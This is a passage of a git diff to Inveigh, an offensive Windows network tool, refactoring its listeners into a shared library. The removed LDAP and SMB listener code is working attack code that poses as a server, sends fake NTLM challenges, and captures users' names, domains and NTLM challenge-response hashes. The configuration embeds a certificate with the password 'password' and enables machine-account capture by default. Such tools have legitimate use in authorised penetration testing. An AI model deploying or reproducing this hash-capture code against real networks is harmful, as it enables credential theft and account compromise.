parameterArray = parameters as object[]; - TcpClient tcpClient = (TcpClient)parameterArray[0]; - NetworkStream tcpStream = tcpClient.GetStream(); - string ntlmChallenge = ""; - string clientIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); - string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); - string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); - while (tcpClient.Connected && Program.isRunning) + if (ex.Message.ToString().Equals("An attempt was made to access a socket in a way forbidden by its access permissions")) { - byte[] requestData = new byte[4096]; - - do - { - Thread.Sleep(100); - } - while (!tcpStream.DataAvailable && tcpClient.Connected); - - while (tcpStream.DataAvailable) - { - tcpStream.Read(requestData, 0, requestData.Length); - } - - LDAPMessage message = new LDAPMessage(); - message.Decode(requestData); - LDAPMessage message2 = new LDAPMessage(); - message2.MessageID = message.MessageID; - byte[] buffer = new byte[0]; - Output.Queue(String.Format("[.] [{0}] LDAP({1}) message type {2} request from {3}:{4}", Output.Timestamp(), listenerPort, message.Tag, clientIP, clientPort)); - - if (message.Tag == 3) - { - LDAPMessage message3 = new LDAPMessage(); - message3.MessageID = message.MessageID; - LDAPSearchRequest searchRequest = new LDAPSearchRequest(); - searchRequest.ReadBytes((byte[][])message.ProtocolOp); - - LDAPSearchResDone resdone = new LDAPSearchResDone(); - resdone.ResultCode = 0; - LDAPSearchResEntry search = new LDAPSearchResEntry(); - - if (String.Equals(searchRequest.Attributes[0], "supportedCapabilities")) - { - LDAPSupportedCapabilities cap = new LDAPSupportedCapabilities(); - search.Attributes = cap.Encode(); - } - else if (String.Equals(searchRequest.Attributes[0], "supportedSASLMechanisms")) - { - LDAPSupportedSASLMechanisms mech = new LDAPSupportedSASLMechanisms(); - search.Attributes = mech.Encode(); - } - - message2.ProtocolOp = search; - message3.ProtocolOp = resdone; - buffer = Utilities.BlockCopy(message2.Encode(4), message3.Encode(5)); - } - else if (message.Tag == 0) - { - LDAPBindRequest bind = new LDAPBindRequest(); - bind.ReadBytes((byte[][])message.ProtocolOp); - LDAPSaslCredentials sasl = new LDAPSaslCredentials(); - sasl.ReadBytes(bind.Authentication); - NTLMNegotiate ntlm = new NTLMNegotiate(); - ntlm.ReadBytes(sasl.Credentials, 0); - - if (ntlm.MessageType == 1) - { - NTLMChallenge challenge = new NTLMChallenge(Program.argChallenge, Program.netbiosDomain, Program.computerName, Program.dnsDomain, Program.computerName, Program.dnsDomain); - byte[] challengeData = challenge.GetBytes(Program.computerName); - ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); - LDAPBindResponse bindResponse = new LDAPBindResponse(); - bindResponse.ServerSaslCreds = challengeData; - LDAPMessage bindMessage = new LDAPMessage(); - bindMessage.MessageID = message.MessageID; - bindMessage.ProtocolOp = bindResponse; - buffer = bindMessage.Encode(3); - Output.Queue(String.Format("[+] [{0}] LDAP({1}) NTLM challenge {2} sent to {3}:{4}", Output.Timestamp(), listenerPort, ntlmChallenge, clientIP, clientPort)); - } - else if (ntlm.MessageType == 3) - { - NTLMResponse ntlmResponse = new NTLMResponse(sasl.Credentials, false); - string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); - string user = Encoding.Unicode.GetString(ntlmResponse.UserName); - string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); - string response2 = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); - Output.NTLMOutput(user, domain, ntlmChallenge, response2, clientIP, host, "LDAP", listenerPort, clientPort, null); - } - - } - - tcpStream.Write(buffer, 0, buffer.Length); - tcpStream.Flush(); + Output.Queue(String.Format("[!] Failed to start LDAP listener on port {0}, check IP and port usage.", port)); + } + else + { + Output.Queue(ex.ToString()); } } diff --git a/Inveigh/Listeners/LLMNRListener.cs b/Inveigh/Listeners/LLMNRListener.cs index acde2b0..93729b5 100644 --- a/Inveigh/Listeners/LLMNRListener.cs +++ b/Inveigh/Listeners/LLMNRListener.cs @@ -1,7 +1,4 @@ using System; -using System.Net; -using System.Net.Sockets; -using Quiddity; using Quiddity.LLMNR; namespace Inveigh diff --git a/Inveigh/Listeners/MDNSListener.cs b/Inveigh/Listeners/MDNSListener.cs index 8e6336c..c8736ed 100644 --- a/Inveigh/Listeners/MDNSListener.cs +++ b/Inveigh/Listeners/MDNSListener.cs @@ -1,12 +1,5 @@ -using Quiddity; -using Quiddity.MDNS; -using Quiddity.Support; +using Quiddity.MDNS; using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Net.Sockets; -using System.Text; namespace Inveigh { diff --git a/Inveigh/Listeners/NBNSListener.cs b/Inveigh/Listeners/NBNSListener.cs index 49e4fc2..6e574d8 100644 --- a/Inveigh/Listeners/NBNSListener.cs +++ b/Inveigh/Listeners/NBNSListener.cs @@ -1,9 +1,6 @@ using System; -using System.Net; -using System.Net.Sockets; using Quiddity; using Quiddity.NetBIOS; -using Quiddity.Support; namespace Inveigh { diff --git a/Inveigh/Listeners/SMBListener.cs b/Inveigh/Listeners/SMBListener.cs index a0e6825..e7606ae 100644 --- a/Inveigh/Listeners/SMBListener.cs +++ b/Inveigh/Listeners/SMBListener.cs @@ -30,231 +30,37 @@ * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ using System; -using System.Net; -using System.Net.Sockets; -using System.Text; -using System.Threading; -using Quiddity; -using Quiddity.NetBIOS; -using Quiddity.NTLM; -using Quiddity.SMB; -using Quiddity.SMB2; -using Quiddity.Support; namespace Inveigh { - class SMBListener + class SMBListener : Quiddity.SMBListener { - internal void Start(IPAddress ipAddress, int port) - { - TCPListener tcpListener = new TCPListener(ipAddress, port); - IAsyncResult tcpAsync; - TcpClient tcpClient; - Guid guid = Guid.NewGuid(); - - try - { - tcpListener.Start(); - } - catch (Exception ex) - { - - if (ex.Message.ToString().Equals("An attempt was made to access a socket in a way forbidden by its access permissions")) - { - Output.Queue(String.Format("[!] Failed to start SMB listener on port {0}, check IP and port usage.", port)); - } - else - { - Output.Queue(ex.ToString()); - } - - Program.enabledSMB = false; - } - - while (Program.isRunning && Program.enabledSMB) - { - tcpAsync = tcpListener.BeginAcceptTcpClient(null, null); - do - { - Thread.Sleep(10); - - if (!Program.isRunning) - { - break; - } - - } - while (!tcpAsync.IsCompleted); + protected override void OutputChallenge(string listenerPort, string clientIP, string clientPort, string challenge) + { + Output.Queue(String.Format("[+] [{0}] SMB({1}) NTLM challenge [{2}] sent to {3}:{4}", Output.Timestamp(), listenerPort, challenge, clientIP, clientPort)); + } - tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); - object[] parameters = { guid, tcpClient }; - ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); - } + protected override void OutputNTLM(string protocol, string listenerPort, string clientIP, string clientPort, string user, string domain, string host, string ntlmChallenge, string ntlmResponseHash, string lmResponseHash) + { + Output.NTLMOutput(user, domain, ntlmChallenge, ntlmResponseHash, clientIP, host, protocol, listenerPort, clientPort, lmResponseHash); + } + protected override void OutputNegotiation(string protocol, string listenerPort, string clientIP, string clientPort) + { + Output.Queue(String.Format("[.] [{0}] {1}({2}) negotiation request received from {3}:{4}", Output.Timestamp(), protocol, listenerPort, clientIP, clientPort)); } - internal void ReceiveClient(object parameters) + protected override void OutputError(Exception ex, int port) { - object[] parameterArray = parameters as object[]; - Guid serverGuid = (Guid)parameterArray[0]; - TcpClient tcpClient = (TcpClient)parameterArray[1]; - NetworkStream tcpStream = tcpClient.GetStream(); - bool isSMB2; - string challenge = ""; - string clientIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); - string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); - string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); - while (tcpClient.Connected && Program.isRunning) + if (ex.Message.ToString().Equals("An attempt was made to access a socket in a way forbidden by its access permissions")) { - byte[] requestData = new byte[4096]; - - do - { - Thread.Sleep(100); - } - while (!tcpStream.DataAvailable && tcpClient.Connected); - - while (tcpStream.DataAvailable) - { - tcpStream.Read(requestData, 0, requestData.Length); - } - - NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(requestData); - SMBHelper smbHelper = new SMBHelper(); - - if (requestNetBIOSSessionService.Type == 0 || smbHelper.Protocol[0] == 0xfe || smbHelper.Protocol[0] == 0xff) - { - int sessionServiceIndex = 0; - - if (requestNetBIOSSessionService.Type == 0) - { - sessionServiceIndex = 4; - } - - byte[] sendBuffer = new byte[0]; - SMBHeader requestSMBHeader = new SMBHeader(); - SMB2Header requestSMB2Header = new SMB2Header(); - smbHelper.ReadBytes(requestData, sessionServiceIndex); - - if (smbHelper.Protocol[0] == 0xfe) - { - isSMB2 = true; - requestSMB2Header.ReadBytes(requestData, sessionServiceIndex); - } - else - { - isSMB2 = false; - requestSMBHeader.ReadBytes(requestData, sessionServiceIndex); - } - - if (!isSMB2 && requestSMBHeader.Command == 0x72 || (isSMB2 && requestSMB2Header.Command == 0)) - { - SMB2NegotiatelRequest smb2NegotiatelRequest = new SMB2NegotiatelRequest(requestData, 64 + sessionServiceIndex); - SMB2Header responseSMB2Header = new SMB2Header(); - SMB2NegotiateResponse smb2NegotiateResponse = new SMB2NegotiateResponse(); - - if (!isSMB2) - { - smb2NegotiateResponse.DialectRivision = new byte[2] { 0xff, 0x02 }; - smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; - Output.Queue(String.Format("[.] [{0}] SMB1({1}) negotiation request received from {2}:{3}", Output.Timestamp(), listenerPort, clientIP, clientPort)); - } - else if (isSMB2) - { - responseSMB2Header.MessageId = requestSMB2Header.MessageId; - - if (smb2NegotiatelRequest.GetMaxDialect() == 0x311) - { - smb2NegotiateResponse.DialectRivision = new byte[2] { 0x11, 0x03 }; - smb2NegotiateResponse.NegotiateContextCount = 3; - smb2NegotiateResponse.Capabilities = new byte[4] { 0x2f, 0x00, 0x00, 0x00 }; - smb2NegotiateResponse.NegotiateContextOffset = 448; - smb2NegotiateResponse.NegotiateContextList = new SMB2NegotiateContext().GetBytes(new string[] { "1", "2", "3" }); - Output.Queue(String.Format("[.] [{0}] SMB3({1}) negotiated with {2}:{3}", Output.Timestamp(), listenerPort, clientIP, clientPort)); - } - else - { - smb2NegotiateResponse.DialectRivision = new byte[2] { 0x10, 0x02 }; - smb2NegotiateResponse.Capabilities = new byte[4] { 0x07, 0x00, 0x00, 0x00 }; - Output.Queue(String.Format("[.] [{0}] SMB2({1}) negotiated with {2}:{3}", Output.Timestamp(), listenerPort, clientIP, clientPort)); - } - - responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; // todo fix - } - - smb2NegotiateResponse.EncodeBuffer(); - smb2NegotiateResponse.ServerGUID = serverGuid.ToByteArray(); - sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2NegotiateResponse); - } - else if (isSMB2 && requestSMB2Header.Command > 0) - { - - switch (requestSMB2Header.Command) - { - - case 1: - { - SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(requestData, 64 + sessionServiceIndex); - NTLMNegotiate requestNTLMNegotiate = new NTLMNegotiate(smb2SessionSetupRequest.Buffer, true); - - if (requestNTLMNegotiate.MessageType == 1) - { - SMB2Header responseSMB2Header = new SMB2Header(); - SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); - responseSMB2Header.Status = new byte[4] { 0x16, 0x00, 0x00, 0xc0 }; - responseSMB2Header.CreditCharge = 1; - responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; - responseSMB2Header.Command = 1; - responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; - responseSMB2Header.MessageId = requestSMB2Header.MessageId; - responseSMB2Header.SessionId = BitConverter.GetBytes(Program.smb2Session); - Program.smb2Session++; - smb2SessionSetupResponse.Pack(Program.argChallenge, Program.netbiosDomain, Program.computerName, Program.dnsDomain, Program.computerName, Program.dnsDomain, out byte[] challengeData); - sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); - challenge = BitConverter.ToString(challengeData).Replace("-", ""); - Output.Queue(String.Format("[+] [{0}] SMB({1}) NTLM challenge [{2}] sent to {3}:{4}", Output.Timestamp(), listenerPort, challenge, clientIP, clientPort)); - } - else if (requestNTLMNegotiate.MessageType == 3) - { - NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer, true); - string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); - string user = Encoding.Unicode.GetString(ntlmResponse.UserName); - string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); - string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-",""); - string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); - Output.NTLMOutput(user, domain, challenge, response, clientIP, host, "SMB", listenerPort, clientPort, lmResponse); - SMB2Header responseSMB2Header = new SMB2Header(); - SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(); - responseSMB2Header.Status = new byte[4] { 0x6d, 0x00, 0x00, 0xc0 }; - //responseSMB2Header.Status = new byte[4] { 0x00, 0x00, 0x00, 0x00 }; - //responseSMB2Header.Status = new byte[4] { 0x22, 0x00, 0x00, 0xc0 }; //access denied - responseSMB2Header.CreditCharge = 1; - responseSMB2Header.Reserved2 = requestSMB2Header.Reserved2; - responseSMB2Header.Command = 1; - responseSMB2Header.Flags = new byte[4] { 0x11, 0x00, 0x00, 0x00 }; - responseSMB2Header.MessageId = requestSMB2Header.MessageId; - responseSMB2Header.SessionId = requestSMB2Header.SessionId; - smb2SessionSetupResponse.SecurityBufferOffset = 0; - sendBuffer = SMB2Helper.GetBytes(new NetBIOSSessionService(), responseSMB2Header, smb2SessionSetupResponse); - } - - } - break; - - } - - } - - tcpStream.Write(sendBuffer, 0, sendBuffer.Length); - tcpStream.Flush(); - } - else - { - // tcpClient.Close(); - } - + Output.Queue(String.Format("[!] Failed to start SMB listener on port {0}, check IP and port usage.", port)); + } + else + { + Output.Queue(ex.ToString()); } } diff --git a/Inveigh/Program.cs b/Inveigh/Program.cs index 98730e4..3643392 100644 --- a/Inveigh/Program.cs +++ b/Inveigh/Program.cs @@ -4,7 +4,6 @@ using System.Linq; using System.Net; using System.IO; using System.Collections; -using Quiddity.NTLM; namespace Inveigh { @@ -14,7 +13,7 @@ namespace Inveigh public static string argCert = "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"; public static string argCertPassword = "password"; public static string argChallenge = ""; - public static string argConsole = "3"; + public static string argConsole = "4"; public static string argConsoleLimit = "-1"; public static string argConsoleStatus = "0"; public static string argConsoleUnique = "Y"; @@ -40,6 +39,7 @@ namespace Inveigh public static string[] argHTTPSPorts = { "443" }; public static string argICMPv6 = "N"; public static string argICMPv6Interval = "200"; + public static string argICMPv6TTL = "1800"; public static string argInspect = "N"; public static string argIPv4 = "Y"; public static string argIPv6 = "Y"; @@ -55,7 +55,7 @@ namespace Inveigh public static string[] argLLMNRTypes = { "A" }; public static string argLogOutput = "Y"; public static string argMAC = ""; - public static string argMachineAccounts = "N"; + public static string argMachineAccount = "Y"; public static string argMDNS = "N"; public static string[] argMDNSQuestions = { "QU", "QM" }; public static string argMDNSTTL = "120"; @@ -91,6 +91,7 @@ namespace Inveigh //end parameters public static ConsoleColor colorPositive = ConsoleColor.Green; // change output colors here public static ConsoleColor colorNegative = ConsoleColor.Red; + public static ConsoleColor colorDisabled = ConsoleColor.DarkGray; public static Hashtable smbSessionTable = Hashtable.Synchronized(new Hashtable()); public static Hashtable httpSessionTable = Hashtable.Synchronized(new Hashtable()); public static IList outputList = new List(); @@ -132,7 +133,7 @@ namespace Inveigh public static bool enabledLLMNR = false; public static bool enabledLocal = false; public static bool enabledLogOutput = false; - public static bool enabledMachineAccounts = false; + public static bool enabledMachineAccountCapture = false; public static bool enabledMDNS = false; public static bool enabledMDNSUnicast = false; public static bool enabledNBNS = false; @@ -167,11 +168,13 @@ namespace Inveigh public static int ntlmv1UniqueCount = 0; public static int ntlmv2UniqueCount = 0; public static int cleartextUniqueCount = 0; + public static int networkInterfaceIndexIPv4 = 0; + public static int networkInterfaceIndexIPv6 = 0; public static string computerName = Environment.MachineName; public static string netbiosDomain = Environment.UserDomainName; public static string dnsDomain = ""; public static ulong smb2Session = 5548434740922023936; // todo check - public static string version = "2.0.2"; + public static string version = "2.0.3"; static void Main(string[] arguments) { @@ -336,6 +339,11 @@ namespace Inveigh argICMPv6Interval = arguments[entry.index + 1]; break; + case "-ICMPV6TTL": + case "/ICMPV6TTL": + argICMPv6TTL = arguments[entry.index + 1].ToUpper(); + break; + case "-IGNOREAGENTS": case "/IGNOREAGENTS": argIgnoreAgents = arguments[entry.index + 1].Split(','); @@ -426,9 +434,9 @@ namespace Inveigh argMAC = arguments[entry.index + 1].ToUpper().Replace(":", "").Replace("-", ""); break; - case "-MACHINEACCOUNTS": - case "/MACHINEACCOUNTS": - argMachineAccounts = arguments[entry.index + 1].ToUpper(); + case "-MACHINEACCOUNT": + case "/MACHINEACCOUNT": + argMachineAccount = arguments[entry.index + 1].ToUpper(); break; case "-MDNS": diff --git a/Inveigh/Protocols/LICENSE b/Inveigh/Protocols/LICENSE deleted file mode 100644 index cea2f49..0000000 --- a/Inveigh/Protocols/LICENSE +++ /dev/null @@ -1,29 +0,0 @@ -BSD 3-Clause License - -Copyright (c) 2021, Kevin Robertson -All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - -1. Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. - -2. Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - -3. Neither the name of the copyright holder nor the names of its - contributors may be used to endorse or promote products derived from - this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE -FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER -CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, -OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/Inveigh/Protocols/Quiddity/LICENSE b/Inveigh/Protocols/Quiddity/LICENSE new file mode 100644 index 0000000..651f1af --- /dev/null +++ b/Inveigh/Protocols/Quiddity/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2022, Kevin Robertson +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/Inveigh/Protocols/Quiddity/Listeners/DHCPv6Listener.cs b/Inveigh/Protocols/Quiddity/Listeners/DHCPv6Listener.cs deleted file mode 100644 index 04cf106..0000000 --- a/Inveigh/Protocols/Quiddity/Listeners/DHCPv6Listener.cs +++ /dev/null @@ -1,177 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.DHCPv6; -using System; -using System.Collections.Generic; -using System.Linq; -using System.Net; -using System.Net.Sockets; -using System.Text; - -namespace Quiddity -{ - public class DHCPv6Listener - { - public string DNSSuffix { get; set; } - public uint Lifetime { get; set; } - public int Prefix { get; set; } - public int Index { get; set; } - - public DHCPv6Listener() - { - this.Index = 1; - 